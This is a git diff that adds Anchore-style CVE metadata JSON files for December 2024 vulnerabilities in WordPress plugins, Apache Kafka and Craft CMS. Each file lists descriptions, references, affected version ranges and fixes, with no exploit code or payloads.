b/data/anchore/2024/CVE-2024-55985.json @@ -0,0 +1,44 @@ +{ + "additionalMetadata": { + "cna": "patchstack", + "cveId": "CVE-2024-55985", + "description": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ydesignservices YDS Support Ticket System allows SQL Injection.This issue affects YDS Support Ticket System: from n/a through 1.0.", + "reason": "Added CPE configurations because not yet analyzed by NVD.", + "references": [ + "https://patchstack.com/database/wordpress/plugin/yds-support-ticket-system/vulnerability/wordpress-yds-support-ticket-system-plugin-1-0-sql-injection-vulnerability?_s_id=cve" + ], + "upstream": { + "datePublished": "2024-12-18T11:38:22.533Z", + "dateReserved": "2024-12-14T19:41:53.295Z", + "dateUpdated": "2024-12-18T16:29:05.115Z", + "digest": "65364b028fe0f5d392b7d361361138d99a27aee41f2129c781c7ac68303fdfbe" + } + }, + "adp": { + "affected": [ + { + "collectionURL": "https://wordpress.org/plugins", + "cpes": [ + "cpe:2.3:a:ydesignservices:yds_support_ticket_system:*:*:*:*:*:wordpress:*:*" + ], + "packageName": "yds-support-ticket-system", + "packageType": "wordpress-plugin", + "product": "YDS Support Ticket System", + "repo": "https://plugins.svn.wordpress.org/yds-support-ticket-system", + "vendor": "ydesignservices", + "versions": [ + { + "lessThanOrEqual": "1.0", + "status": "affected", + "version": "0", + "versionType": "custom" + } + ] + } + ], + "providerMetadata": { + "orgId": "00000000-0000-4000-8000-000000000000", + "shortName": "anchoreadp" + } + } +} \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-56047.json b/data/anchore/2024/CVE-2024-56047.json new file mode 100644 index 00000000..2247f9a1 --- /dev/null +++ b/data/anchore/2024/CVE-2024-56047.json @@ -0,0 +1,46 @@ +{ + "additionalMetadata": { + "cna": "patchstack", + "cveId": "CVE-2024-56047", + "description": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in VibeThemes WPLMS allows SQL Injection.This issue affects WPLMS: from n/a before 1.9.9.5.3.", + "reason": "Added CPE configurations because not yet analyzed by NVD.", + "references": [ + "https://patchstack.com/database/wordpress/plugin/wplms-plugin/vulnerability/wordpress-wplms-plugin-1-9-9-5-3-subscriber-sql-injection-vulnerability?_s_id=cve" + ], + "solutions": [ + "Update the WordPress WPLMS plugin to the latest available version (at least 1.9.9.5.3)." + ], + "upstream": { + "datePublished": "2024-12-18T18:58:59.505Z", + "dateReserved": "2024-12-14T19:42:58.219Z", + "dateUpdated": "2024-12-18T19:15:17.846Z", + "digest": "73da59f55e08a867076d099982ec97bf302e785e5b33d372d2ce48bd3d4d2c42" + } + }, + "adp": { + "affected": [ + { + "collectionURL": "https://themeforest.net", + "cpes": [ + "cpe:2.3:a:vibethemes:wordpress_learning_management_system_:*:*:*:*:*:wordpress:*:*" + ], + "packageName": "wplms", + "packageType": "wordpress-theme", + "product": "WPLMS", + "vendor": "VibeThemes", + "versions": [ + { + "lessThan": "1.9.9.5.3", + "status": "affected", + "version": "0", + "versionType": "custom" + } + ] + } + ], + "providerMetadata": { + "orgId": "00000000-0000-4000-8000-000000000000", + "shortName": "anchoreadp" + } + } +} \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-56048.json b/data/anchore/2024/CVE-2024-56048.json new file mode 100644 index 00000000..e0c41839 --- /dev/null +++ b/data/anchore/2024/CVE-2024-56048.json @@ -0,0 +1,46 @@ +{ + "additionalMetadata": { + "cna": "patchstack", + "cveId": "CVE-2024-56048", + "description": "Missing Authorization vulnerability in VibeThemes WPLMS allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects WPLMS: from n/a through 1.9.9.", + "reason": "Added CPE configurations because not yet analyzed by NVD.", + "references": [ + "https://patchstack.com/database/wordpress/plugin/wplms-plugin/vulnerability/wordpress-wplms-plugin-1-9-9-arbitrary-option-update-to-privilege-escalation-vulnerability?_s_id=cve" + ], + "solutions": [ + "Update the WordPress WPLMS plugin to the latest available version (at least 1.9.9.1)." + ], + "upstream": { + "datePublished": "2024-12-18T18:57:27.446Z", + "dateReserved": "2024-12-14T19:42:58.219Z", + "dateUpdated": "2024-12-18T19:15:30.469Z", + "digest": "3ccb97e9b172197eed843b99933e58a83d16a06c152227c32813e59da8ae31ff" + } + }, + "adp": { + "affected": [ + { + "collectionURL": "https://themeforest.net", + "cpes": [ + "cpe:2.3:a:vibethemes:wordpress_learning_management_system_:*:*:*:*:*:wordpress:*:*" + ], + "packageName": "wplms", + "packageType": "wordpress-theme", + "product": "WPLMS", + "vendor": "VibeThemes", + "versions": [ + { + "lessThanOrEqual": "1.9.9", + "status": "affected", + "version": "0", + "versionType": "custom" + } + ] + } + ], + "providerMetadata": { + "orgId": "00000000-0000-4000-8000-000000000000", + "shortName": "anchoreadp" + } + } +} \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-56049.json b/data/anchore/2024/CVE-2024-56049.json new file mode 100644 index 00000000..a47a18d0 --- /dev/null +++ b/data/anchore/2024/CVE-2024-56049.json @@ -0,0 +1,46 @@ +{ + "additionalMetadata": { + "cna": "patchstack", + "cveId": "CVE-2024-56049", + "description": "Path Traversal: '.../...//' vulnerability in VibeThemes WPLMS allows Path Traversal.This issue affects WPLMS: from n/a before 1.9.9.5.2.", + "reason": "Added CPE configurations because not yet analyzed by NVD.", + "references": [ + "https://patchstack.com/database/wordpress/plugin/wplms-plugin/vulnerability/wordpress-wplms-plugin-1-9-9-5-2-subscriber-arbitrary-file-deletion-vulnerability?_s_id=cve" + ], + "solutions": [ + "Update the WordPress WPLMS plugin to the latest available version (at least 1.9.9.5.2)." + ], + "upstream": { + "datePublished": "2024-12-18T18:46:23.626Z", + "dateReserved": "2024-12-14T19:42:58.219Z", + "dateUpdated": "2024-12-18T19:16:42.161Z", + "digest": "992428dc1cb8fff9ae5944623f4a5e4a79db9c1006c8c9aa144ae9d85139d26a" + } + }, + "adp": { + "affected": [ + { + "collectionURL": "https://themeforest.net", + "cpes": [ + "cpe:2.3:a:vibethemes:wordpress_learning_management_system_:*:*:*:*:*:wordpress:*:*" + ], + "packageName": "wplms", + "packageType": "wordpress-theme", + "product": "WPLMS", + "vendor": "VibeThemes", + "versions": [ + { + "lessThan": "1.9.9.5.2", + "status": "affected", + "version": "0", + "versionType": "custom" + } + ] + } + ], + "providerMetadata": { + "orgId": "00000000-0000-4000-8000-000000000000", + "shortName": "anchoreadp" + } + } +} \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-56050.json b/data/anchore/2024/CVE-2024-56050.json new file mode 100644 index 00000000..45518616 --- /dev/null +++ b/data/anchore/2024/CVE-2024-56050.json @@ -0,0 +1,46 @@ +{ + "additionalMetadata": { + "cna": "patchstack", + "cveId": "CVE-2024-56050", + "description": "Unrestricted Upload of File with Dangerous Type vulnerability in VibeThemes WPLMS allows Upload a Web Shell to a Web Server.This issue affects WPLMS: from n/a before 1.9.9.5.3.", + "reason": "Added CPE configurations because not yet analyzed by NVD.", + "references": [ + "https://patchstack.com/database/wordpress/plugin/wplms-plugin/vulnerability/wordpress-wplms-plugin-1-9-9-5-3-subscriber-arbitrary-file-upload-vulnerability?_s_id=cve" + ], + "solutions": [ + "Update the WordPress WPLMS plugin to the latest available version (at least 1.9.9.5.3)." + ], + "upstream": { + "datePublished": "2024-12-18T18:56:30.596Z", + "dateReserved": "2024-12-14T19:42:58.219Z", + "dateUpdated": "2024-12-18T19:15:41.175Z", + "digest": "73da59f55e08a867076d099982ec97bf302e785e5b33d372d2ce48bd3d4d2c42" + } + }, + "adp": { + "affected": [ + { + "collectionURL": "https://themeforest.net", + "cpes": [ + "cpe:2.3:a:vibethemes:wordpress_learning_management_system_:*:*:*:*:*:wordpress:*:*" + ], + "packageName": "wplms", + "packageType": "wordpress-theme", + "product": "WPLMS", + "vendor": "VibeThemes", + "versions": [ + { + "lessThan": "1.9.9.5.3", + "status": "affected", + "version": "0", + "versionType": "custom" + } + ] + } + ], + "providerMetadata": { + "orgId": "00000000-0000-4000-8000-000000000000", + "shortName": "anchoreadp" + } + } +} \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-56051.json b/data/anchore/2024/CVE-2024-56051.json new file mode 100644 index 00000000..bf99be96 --- /dev/null +++ b/data/anchore/2024/CVE-2024-56051.json @@ -0,0 +1,46 @@ +{ + "additionalMetadata": { + "cna": "patchstack", + "cveId": "CVE-2024-56051", + "description": "Improper Control of Generation of Code ('Code Injection') vulnerability in VibeThemes WPLMS allows Code Injection.This issue affects WPLMS: from n/a before 1.9.9.5.", + "reason": "Added CPE configurations because not yet analyzed by NVD.", + "references": [ + "https://patchstack.com/database/wordpress/plugin/wplms-plugin/vulnerability/wordpress-wplms-plugin-1-9-9-5-student-remote-code-execution-rce-vulnerability?_s_id=cve" + ], + "solutions": [ + "Update the WordPress WPLMS plugin to the latest available version (at least 1.9.9.5)." + ], + "upstream": { + "datePublished": "2024-12-18T18:41:39.681Z", + "dateReserved": "2024-12-14T19:42:58.219Z", + "dateUpdated": "2024-12-18T18:49:26.763Z", + "digest": "eb71a7edc5e31cf36095ef21cef111ede792165ead4935a85f0226960a8db2ea" + } + }, + "adp": { + "affected": [ + { + "collectionURL": "https://themeforest.net", + "cpes": [ + "cpe:2.3:a:vibethemes:wordpress_learning_management_system_:*:*:*:*:*:wordpress:*:*" + ], + "packageName": "wplms", + "packageType": "wordpress-theme", + "product": "WPLMS", + "vendor": "VibeThemes", + "versions": [ + { + "lessThan": "1.9.9.5", + "status": "affected", + "version": "0", + "versionType": "custom" + } + ] + } + ], + "providerMetadata": { + "orgId": "00000000-0000-4000-8000-000000000000", + "shortName": "anchoreadp" + } + } +} \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-56052.json b/data/anchore/2024/CVE-2024-56052.json new file mode 100644 index 00000000..b58bb91c --- /dev/null +++ b/data/anchore/2024/CVE-2024-56052.json @@ -0,0 +1,46 @@ +{ + "additionalMetadata": { + "cna": "patchstack", + "cveId": "CVE-2024-56052", + "description": "Unrestricted Upload of File with Dangerous Type vulnerability in VibeThemes WPLMS allows Upload a Web Shell to a Web Server.This issue affects WPLMS: from n/a before 1.9.9.5.2.", + "reason": "Added CPE configurations because not yet analyzed by NVD.", + "references": [ + "https://patchstack.com/database/wordpress/plugin/wplms-plugin/vulnerability/wordpress-wplms-plugin-1-9-9-5-2-student-arbitrary-file-upload-vulnerability?_s_id=cve" + ], + "solutions": [ + "Update the WordPress WPLMS plugin to the latest available version (at least 1.9.9.5.2)." + ], + "upstream": { + "datePublished": "2024-12-18T18:55:19.251Z", + "dateReserved": "2024-12-14T19:43:05.898Z", + "dateUpdated": "2024-12-18T19:15:48.973Z", + "digest": "992428dc1cb8fff9ae5944623f4a5e4a79db9c1006c8c9aa144ae9d85139d26a" + } + }, + "adp": { + "affected": [ + { + "collectionURL": "https://themeforest.net", + "cpes": [ + "cpe:2.3:a:vibethemes:wordpress_learning_management_system_:*:*:*:*:*:wordpress:*:*" + ], + "packageName": "wplms", + "packageType": "wordpress-theme", + "product": "WPLMS", + "vendor": "VibeThemes", + "versions": [ + { + "lessThan": "1.9.9.5.2", + "status": "affected", + "version": "0", + "versionType": "custom" + } + ] + } + ], + "providerMetadata": { + "orgId": "00000000-0000-4000-8000-000000000000", + "shortName": "anchoreadp" + } + } +} \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-56053.json b/data/anchore/2024/CVE-2024-56053.json new file mode 100644 index 00000000..a762dc2c --- /dev/null +++ b/data/anchore/2024/CVE-2024-56053.json @@ -0,0 +1,46 @@ +{ + "additionalMetadata": { + "cna": "patchstack", + "cveId": "CVE-2024-56053", + "description": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in VibeThemes WPLMS allows SQL Injection.This issue affects WPLMS: from n/a before 1.9.9.5.3.", + "reason": "Added CPE configurations because not yet analyzed by NVD.", + "references": [ + "https://patchstack.com/database/wordpress/plugin/wplms-plugin/vulnerability/wordpress-wplms-plugin-1-9-9-5-3-instructor-sql-injection-vulnerability?_s_id=cve" + ], + "solutions": [ + "Update the WordPress WPLMS plugin to the latest available version (at least 1.9.9.5.3)." + ], + "upstream": { + "datePublished": "2024-12-18T18:58:14.866Z", + "dateReserved": "2024-12-14T19:43:05.899Z", + "dateUpdated": "2024-12-18T19:15:23.880Z", + "digest": "73da59f55e08a867076d099982ec97bf302e785e5b33d372d2ce48bd3d4d2c42" + } + }, + "adp": { + "affected": [ + { + "collectionURL": "https://themeforest.net", + "cpes": [ + "cpe:2.3:a:vibethemes:wordpress_learning_management_system_:*:*:*:*:*:wordpress:*:*" + ], + "packageName": "wplms", + "packageType": "wordpress-theme", + "product": "WPLMS", + "vendor": "VibeThemes", + "versions": [ + { + "lessThan": "1.9.9.5.3", + "status": "affected", + "version": "0", + "versionType": "custom" + } + ] + } + ], + "providerMetadata": { + "orgId": "00000000-0000-4000-8000-000000000000", + "shortName": "anchoreadp" + } + } +} \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-56054.json b/data/anchore/2024/CVE-2024-56054.json new file mode 100644 index 00000000..4e777a64 --- /dev/null +++ b/data/anchore/2024/CVE-2024-56054.json @@ -0,0 +1,46 @@ +{ + "additionalMetadata": { + "cna": "patchstack", + "cveId": "CVE-2024-56054", + "description": "Unrestricted Upload of File with Dangerous Type vulnerability in VibeThemes WPLMS allows Upload a Web Shell to a Web Server.This issue affects WPLMS: from n/a before 1.9.9.5.2.", + "reason": "Added CPE configurations because not yet analyzed by NVD.", + "references": [ + "https://patchstack.com/database/wordpress/plugin/wplms-plugin/vulnerability/wordpress-wplms-plugin-1-9-9-5-2-instructor-arbitrary-file-upload-vulnerability?_s_id=cve" + ], + "solutions": [ + "Update the WordPress WPLMS plugin to the latest available version (at least 1.9.9.5.2)." + ], + "upstream": { + "datePublished": "2024-12-18T18:53:51.053Z", + "dateReserved": "2024-12-14T19:43:05.900Z", + "dateUpdated": "2024-12-18T19:15:55.569Z", + "digest": "992428dc1cb8fff9ae5944623f4a5e4a79db9c1006c8c9aa144ae9d85139d26a" + } + }, + "adp": { + "affected": [ + { + "collectionURL": "https://themeforest.net", + "cpes": [ + "cpe:2.3:a:vibethemes:wordpress_learning_management_system_:*:*:*:*:*:wordpress:*:*" + ], + "packageName": "wplms", + "packageType": "wordpress-theme", + "product": "WPLMS", + "vendor": "VibeThemes", + "versions": [ + { + "lessThan": "1.9.9.5.2", + "status": "affected", + "version": "0", + "versionType": "custom" + } + ] + } + ], + "providerMetadata": { + "orgId": "00000000-0000-4000-8000-000000000000", + "shortName": "anchoreadp" + } + } +} \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-56055.json b/data/anchore/2024/CVE-2024-56055.json new file mode 100644 index 00000000..5f162593 --- /dev/null +++ b/data/anchore/2024/CVE-2024-56055.json @@ -0,0 +1,46 @@ +{ + "additionalMetadata": { + "cna": "patchstack", + "cveId": "CVE-2024-56055", + "description": "Path Traversal: '.../...//' vulnerability in VibeThemes WPLMS allows Path Traversal.This issue affects WPLMS: from n/a before 1.9.9.5.2.", + "reason": "Added CPE configurations because not yet analyzed by NVD.", + "references": [ + "https://patchstack.com/database/wordpress/plugin/wplms-plugin/vulnerability/wordpress-wplms-plugin-1-9-9-5-2-arbitrary-directory-deletion-vulnerability?_s_id=cve" + ], + "solutions": [ + "Update the WordPress WPLMS plugin to the latest available version (at least 1.9.9.5.2)." + ], + "upstream": { + "datePublished": "2024-12-18T18:42:49.539Z", + "dateReserved": "2024-12-14T19:43:05.900Z", + "dateUpdated": "2024-12-18T19:02:18.760Z", + "digest": "992428dc1cb8fff9ae5944623f4a5e4a79db9c1006c8c9aa144ae9d85139d26a" + } + }, + "adp": { + "affected": [ + { + "collectionURL": "https://themeforest.net", + "cpes": [ + "cpe:2.3:a:vibethemes:wordpress_learning_management_system_:*:*:*:*:*:wordpress:*:*" + ], + "packageName": "wplms", + "packageType": "wordpress-theme", + "product": "WPLMS", + "vendor": "VibeThemes", + "versions": [ + { + "lessThan": "1.9.9.5.2", + "status": "affected", + "version": "0", + "versionType": "custom" + } + ] + } + ], + "providerMetadata": { + "orgId": "00000000-0000-4000-8000-000000000000", + "shortName": "anchoreadp" + } + } +} \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-56057.json b/data/anchore/2024/CVE-2024-56057.json new file mode 100644 index 00000000..72f3f79c --- /dev/null +++ b/data/anchore/2024/CVE-2024-56057.json @@ -0,0 +1,46 @@ +{ + "additionalMetadata": { + "cna": "patchstack", + "cveId": "CVE-2024-56057", + "description": "Unrestricted Upload of File with Dangerous Type vulnerability in VibeThemes WPLMS allows Upload a Web Shell to a Web Server.This issue affects WPLMS: from n/a before 1.9.9.5.2.", + "reason": "Added CPE configurations because not yet analyzed by NVD.", + "references": [ + "https://patchstack.com/database/wordpress/plugin/wplms-plugin/vulnerability/wordpress-wplms-plugin-1-9-9-5-2-arbitrary-file-upload-vulnerability?_s_id=cve" + ], + "solutions": [ + "Update the WordPress WPLMS plugin to the latest available version (at least 1.9.9.5.2)." + ], + "upstream": { + "datePublished": "2024-12-18T18:52:17.015Z", + "dateReserved": "2024-12-14T19:43:05.902Z", + "dateUpdated": "2024-12-18T19:16:02.939Z", + "digest": "992428dc1cb8fff9ae5944623f4a5e4a79db9c1006c8c9aa144ae9d85139d26a" + } + }, + "adp": { + "affected": [ + { + "collectionURL": "https://themeforest.net", + "cpes": [ + "cpe:2.3:a:vibethemes:wordpress_learning_management_system_:*:*:*:*:*:wordpress:*:*" + ], + "packageName": "wplms", + "packageType": "wordpress-theme", + "product": "WPLMS", + "vendor": "VibeThemes", + "versions": [ + { + "lessThan": "1.9.9.5.2", + "status": "affected", + "version": "0", + "versionType": "custom" + } + ] + } + ], + "providerMetadata": { + "orgId": "00000000-0000-4000-8000-000000000000", + "shortName": "anchoreadp" + } + } +} \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-56128.json b/data/anchore/2024/CVE-2024-56128.json new file mode 100644 index 00000000..1a000803 --- /dev/null +++ b/data/anchore/2024/CVE-2024-56128.json @@ -0,0 +1,53 @@ +{ + "additionalMetadata": { + "cna": "apache", + "cveId": "CVE-2024-56128", + "description": "Incorrect Implementation of Authentication Algorithm in Apache Kafka's SCRAM implementation.\n\nIssue Summary:\nApache Kafka's implementation of the Salted Challenge Response Authentication Mechanism (SCRAM) did not fully adhere to the requirements of RFC 5802 [1].\nSpecifically, as per RFC 5802, the server must verify that the nonce sent by the client in the second message matches the nonce sent by the server in its first message.\nHowever, Kafka's SCRAM implementation did not perform this validation.\n\nImpact:\nThis vulnerability is exploitable only when an attacker has plaintext access to the SCRAM authentication exchange. However, the usage of SCRAM over plaintext is strongly\ndiscouraged as it is considered an insecure practice [2]. Apache Kafka recommends deploying SCRAM exclusively with TLS encryption to protect SCRAM exchanges from interception [3].\nDeployments using SCRAM with TLS are not affected by this issue.\n\nHow to Detect If You Are Impacted:\nIf your deployment uses SCRAM authentication over plaintext communication channels (without TLS encryption), you are likely impacted.\nTo check if TLS is enabled, review your server.properties configuration file for listeners property. If you have SASL_PLAINTEXT in the listeners, then you are likely impacted.\n\nFix Details:\nThe issue has been addressed by introducing nonce verification in the final message of the SCRAM authentication exchange to ensure compliance with RFC 5802.\n\nAffected Versions:\nApache Kafka versions 0.10.2.0 through 3.9.0, excluding the fixed versions below.\n\nFixed Versions:\n3.9.0\n3.8.1\n3.7.2\n\nUsers are advised to upgrade to 3.7.2 or later to mitigate this issue.\n\nRecommendations for Mitigation:\nUsers unable to upgrade to the fixed versions can mitigate the issue by:\n- Using TLS with SCRAM Authentication:\nAlways deploy SCRAM over TLS to encrypt authentication exchanges and protect against interception.\n- Considering Alternative Authentication Mechanisms:\nEvaluate alternative authentication mechanisms, such as PLAIN, Kerberos or OAuth with TLS, which provide additional layers of security.", + "reason": "Added CPE configurations because not yet analyzed by NVD.", + "references": [ + "https://datatracker.ietf.org/doc/html/rfc5802", + "https://datatracker.ietf.org/doc/html/rfc5802#section-9", + "https://kafka.apache.org/documentation/#security_sasl_scram_security", + "https://lists.apache.org/thread/84dh4so32lwn7wr6c5s9mwh381vx9wkw" + ], + "upstream": { + "datePublished": "2024-12-18T13:38:03.068Z", + "dateReserved": "2024-12-16T14:52:48.326Z", + "dateUpdated": "2024-12-18T17:02:47.926Z", + "digest": "598da8953ca50d00c140ea85768fa1efda78795b2c1aec28148e878a87042d89" + } + }, + "adp": { + "affected": [ + { + "collectionURL": "https://repo.maven.apache.org/maven2", + "cpes": [ + "cpe:2.3:a:apache:kafka:*:*:*:*:*:maven:*:*", + "cpe:2.3:a:org.apache.kafka:kafka:*:*:*:*:*:maven:*:*" + ], + "packageName": "org.apache.kafka:kafka", + "packageType": "maven", + "product": "Apache Kafka", + "vendor": "Apache Software Foundation", + "versions": [ + { + "lessThan": "3.7.2", + "status": "affected", + "version": "0.10.2.0", + "versionType": "semver" + }, + { + "lessThan": "3.8.1", + "status": "affected", + "version": "3.8.0", + "versionType": "semver" + } + ] + } + ], + "providerMetadata": { + "orgId": "00000000-0000-4000-8000-000000000000", + "shortName": "anchoreadp" + } + } +} \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-56145.json b/data/anchore/2024/CVE-2024-56145.json new file mode 100644 index 00000000..9a734def --- /dev/null +++ b/data/anchore/2024/CVE-2024-56145.json @@ -0,0 +1,51 @@ +{ + "additionalMetadata": { + "cna": "github_m", + "cveId": "CVE-2024-56145", + "description": "Craft is a flexible, user-friendly CMS for creating custom digital experiences on the web and beyond. Users of affected versions are affected by this vulnerability if their php.ini configuration has `register_argc_argv` enabled. For these users an unspecified remote code execution vector is present. Users are advised to update to version 4.13.2 or 5.5.2. Users unable to upgrade should disable `register_argc_argv` to mitigate the issue.", + "reason": "Added CPE configurations because not yet analyzed by NVD.", + "references": [ + "https://github.com/craftcms/cms/commit/82e893fb794d30563da296bca31379c0df0079b3", + "https://github.com/craftcms/cms/security/advisories/GHSA-2p6p-9rc9-62j9" + ], + "upstream": { + "datePublished": "2024-12-18T20:37:34.301Z", + "dateReserved": "2024-12-16T18:04:39.983Z", + "dateUpdated": "2024-12-18T21:10:48.315Z", + "digest": "fd488b59f0371d0786fa3cda8221ea5d372155c5234137065b1bae8e5d275a6f" + } + }, + "adp": { + "affected": [ + { + "collectionURL": "https://packagist.org", + "cpes": [ + "cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:php:*:*" + ], + "packageName": "craftcms/cms", + "packageType": "php-composer", + "product": "cms", + "repo": "https://github.com/craftcms/cms", + "vendor": "craftcms", + "versions": [ + { + "lessThan": "4.13.2", + "status": "affected", + "version": "4.0.0-rc1", + "versionType": "custom" + }, + { + "lessThan": "5.5.2", + "status": "affected", + "version": "5.0.0-rc1", + "versionType": "custom" + } + ] + } + ], + "providerMetadata": { + "orgId": "00000000-0000-4000-8000-000000000000", + "shortName": "anchoreadp" + } + } +} \ No newline at end of file